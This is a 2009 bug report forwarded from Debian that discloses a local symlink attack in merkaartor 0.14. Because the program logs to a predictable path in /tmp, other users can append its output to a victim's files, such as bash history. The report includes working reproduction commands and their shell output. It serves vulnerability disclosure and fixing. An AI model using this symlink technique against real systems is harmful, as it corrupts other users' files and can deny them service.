merkaartor: minor symlink attack #2320
Description
Reporter: bernd[at]bzed.de
[Submitted to the original trac issue database at 7.04am, Sunday, 27th September 2009]
[Forwarded from http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=548546]
Found a minor symlink attack in merkaartor. It allows a local attacker
to append the contents of the merkaartor log file to arbitrary files
owned by the user running merkaartor.
It may be used to DoS any applications that require their data files to
be valid before starting.
While no data loss is immediately obvious, it is possible that
corrupting files by appending data could lead other software to destroy
the newly corrupted data. An example of this could be bash. A merkaartor
log file can be fairly long if the user has enabled map tile downloads
and browses a large area and lots of tiles over one map editing session.
Merkaartor would append many lines to the user's bash history and next
time they start bash, their bash history could be larger than bash's
history limit settings, then bash would take the latest lines (all
merkaartor logs) and discard the legitimate bash history.
Steps to reproduce:
pabs@chianamo:~/tmp$ sudo rm -f /tmp/merkaartor.log /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ sudo su -c 'ln -s /home/pabs/tmp/foo.log /tmp/merkaartor.log' nobody
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
ls: cannot access /home/pabs/tmp/foo.log: No such file or directory
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ merkaartor
**** "2009-09-27T11:49:39" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:49:42" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
-rw-r----- 1 pabs pabs 189 2009-09-27 11:49 /home/pabs/tmp/foo.log
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
**** "2009-09-27T11:49:39" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:49:42" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ echo test > foo.log
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
test
pabs@chianamo:~/tmp$ merkaartor
**** "2009-09-27T11:50:20" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:50:24" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
test
**** "2009-09-27T11:50:20" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:50:24" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
-rw-r----- 1 pabs pabs 194 2009-09-27 11:50 /home/pabs/tmp/foo.log
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log